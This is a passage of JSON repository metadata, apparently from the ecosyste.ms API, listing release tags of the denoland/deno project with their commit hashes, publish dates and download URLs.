deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz